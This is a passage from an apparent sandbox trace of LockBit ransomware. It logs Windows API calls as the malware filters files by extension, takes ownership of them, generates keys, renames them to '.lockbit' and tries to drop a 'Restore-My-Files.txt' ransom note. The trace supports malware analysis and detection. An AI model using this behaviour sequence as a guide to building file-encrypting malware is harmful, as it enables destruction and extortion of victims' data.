SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.596] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-previous-static.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.596] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-previous-static.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.597] CloseHandle (hObject=0x3a0) returned 1 [0079.597] free (_Block=0x77d800) [0079.597] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-previous-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\btn-previous-static.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3a0 [0079.597] CreateIoCompletionPort (FileHandle=0x3a0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0079.597] malloc (_Size=0x40068) returned 0x1ff1e60 [0079.598] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=3595) returned 1 [0079.598] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.599] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.599] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0079.599] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.599] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.599] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0079.599] ReadFile (in: hFile=0x3a0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0079.609] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-previous-static.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-previous-static.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0079.609] malloc (_Size=0xc0) returned 0x77d800 [0079.610] NtSetInformationFile (FileHandle=0x3a0, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xc0, FileInformationClass=0xa) returned 0x0 [0079.610] free (_Block=0x77d800) [0079.610] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-previous-static.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl") returned 1 [0079.610] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Restore-My-Files.txt") returned 74 [0079.610] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.610] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x729d59b7, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x729d59b7, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4a39de7d, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x75d, dwReserved0=0x0, dwReserved1=0x0, cFileName="button-highlight.png", cAlternateFileName="")) returned 1 [0079.610] lstrcmpiW (lpString1=".", lpString2="button-highlight.png") returned -1 [0079.610] lstrcmpiW (lpString1="..", lpString2="button-highlight.png") returned -1 [0079.611] PathFindExtensionW (pszPath="button-highlight.png") returned=".png" [0079.611] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0079.611] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0079.611] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0079.611] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0079.611] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0079.611] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0079.611] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0079.611] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0079.611] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0079.611] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0079.611] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0079.611] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0079.611] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0079.611] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0079.611] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0079.611] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0079.611] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0079.611] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0079.611] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0079.611] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0079.612] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0079.612] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0079.612] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0079.612] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0079.612] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0079.612] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0079.612] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0079.612] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0079.612] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0079.612] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0079.612] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0079.612] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0079.612] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0079.612] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0079.612] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0079.612] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0079.612] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0079.612] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0079.612] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0079.612] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0079.612] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0079.612] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0079.613] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0079.613] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0079.613] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0079.613] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0079.613] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0079.613] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="button-highlight.png") returned 1 [0079.613] lstrcmpiW (lpString1="ntldr", lpString2="button-highlight.png") returned 1 [0079.613] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="button-highlight.png") returned 1 [0079.613] lstrcmpiW (lpString1="bootsect.bak", lpString2="button-highlight.png") returned -1 [0079.613] lstrcmpiW (lpString1="autorun.inf", lpString2="button-highlight.png") returned -1 [0079.613] lstrcmpiW (lpString1="thumbs.db", lpString2="button-highlight.png") returned 1 [0079.613] lstrcmpiW (lpString1="iconcache.db", lpString2="button-highlight.png") returned 1 [0079.613] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\") returned="" [0079.613] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\button-highlight.png") returned=".png" [0079.613] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0079.613] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0079.613] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0079.613] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0079.613] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0079.613] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0079.614] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0079.614] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0079.614] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0079.614] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0079.614] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0079.614] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0079.614] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0079.614] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0079.614] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0079.614] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0079.614] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0079.614] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0079.614] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0079.614] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0079.614] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0079.614] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0079.614] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0079.614] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0079.614] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0079.614] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0079.614] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0079.615] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0079.615] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\button-highlight.png.lockbit") returned 82 [0079.615] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\button-highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\button-highlight.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.615] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0079.616] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0079.616] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0079.616] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0079.616] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0079.616] RtlFreeAnsiString (AnsiString="\\") [0079.616] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c0) returned 0x0 [0079.616] malloc (_Size=0x200) returned 0x77d800 [0079.616] NtQueryInformationToken (in: TokenHandle=0x3c0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0079.616] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.616] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.616] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\button-highlight.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.617] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\button-highlight.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.617] CloseHandle (hObject=0x3c0) returned 1 [0079.617] free (_Block=0x77d800) [0079.617] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\button-highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\button-highlight.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c0 [0079.618] CreateIoCompletionPort (FileHandle=0x3c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0079.618] malloc (_Size=0x40068) returned 0x2031ed0 [0079.619] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0x2031ee8 | out: lpFileSize=0x2031ee8*=1885) returned 1 [0079.619] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.619] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.619] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2071f04, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2071f04) returned 0x0 [0079.620] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.620] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.620] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2071f14, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2071f14) returned 0x0 [0079.620] ReadFile (in: hFile=0x3c0, lpBuffer=0x2031f04, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04*, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0) returned 1 [0079.631] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\button-highlight.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\button-highlight.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0079.631] malloc (_Size=0xba) returned 0x77d800 [0079.631] NtSetInformationFile (FileHandle=0x3c0, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xba, FileInformationClass=0xa) returned 0x0 [0079.632] free (_Block=0x77d800) [0079.632] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\button-highlight.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl") returned 1 [0079.632] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Restore-My-Files.txt") returned 74 [0079.632] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.632] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x729d59b7, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x729d59b7, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4a39de7d, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x55f, dwReserved0=0x0, dwReserved1=0x0, cFileName="chapters-static.png", cAlternateFileName="")) returned 1 [0079.632] lstrcmpiW (lpString1=".", lpString2="chapters-static.png") returned -1 [0079.632] lstrcmpiW (lpString1="..", lpString2="chapters-static.png") returned -1 [0079.632] PathFindExtensionW (pszPath="chapters-static.png") returned=".png" [0079.632] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0079.632] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0079.632] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0079.632] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0079.633] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0079.633] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0079.633] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0079.633] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0079.633] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0079.633] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0079.633] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0079.633] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0079.633] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0079.633] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0079.633] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0079.633] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0079.633] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0079.633] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0079.633] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0079.633] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0079.633] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0079.633] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0079.633] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0079.633] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0079.633] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0079.633] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0079.634] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0079.634] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0079.634] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0079.634] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0079.634] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0079.634] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0079.634] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0079.634] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0079.634] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0079.634] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0079.634] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0079.634] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0079.634] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0079.634] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0079.634] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0079.634] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0079.634] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0079.634] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0079.634] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0079.634] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0079.634] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0079.634] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="chapters-static.png") returned 1 [0079.635] lstrcmpiW (lpString1="ntldr", lpString2="chapters-static.png") returned 1 [0079.635] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="chapters-static.png") returned 1 [0079.635] lstrcmpiW (lpString1="bootsect.bak", lpString2="chapters-static.png") returned -1 [0079.635] lstrcmpiW (lpString1="autorun.inf", lpString2="chapters-static.png") returned -1 [0079.635] lstrcmpiW (lpString1="thumbs.db", lpString2="chapters-static.png") returned 1 [0079.635] lstrcmpiW (lpString1="iconcache.db", lpString2="chapters-static.png") returned 1 [0079.635] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\") returned="" [0079.635] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\chapters-static.png") returned=".png" [0079.635] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0079.635] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0079.635] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0079.635] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0079.635] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0079.635] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0079.635] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0079.635] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0079.635] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0079.635] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0079.635] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0079.635] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0079.635] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0079.636] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0079.636] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0079.636] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0079.636] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0079.636] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0079.636] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0079.636] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0079.636] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0079.636] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0079.636] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0079.636] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0079.636] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0079.636] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0079.636] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0079.636] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0079.636] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\chapters-static.png.lockbit") returned 81 [0079.636] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\chapters-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\chapters-static.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.645] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0079.645] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0079.645] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0079.645] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0079.646] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0079.646] RtlFreeAnsiString (AnsiString="\\") [0079.646] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3bc) returned 0x0 [0079.646] malloc (_Size=0x200) returned 0x77d800 [0079.646] NtQueryInformationToken (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0079.646] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.646] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.646] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\chapters-static.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.646] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\chapters-static.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.647] CloseHandle (hObject=0x3bc) returned 1 [0079.647] free (_Block=0x77d800) [0079.647] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\chapters-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\chapters-static.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0079.647] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0079.647] malloc (_Size=0x40068) returned 0x1fb18c0 [0079.647] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=1375) returned 1 [0079.647] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.648] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.648] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0079.648] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.648] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.648] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, 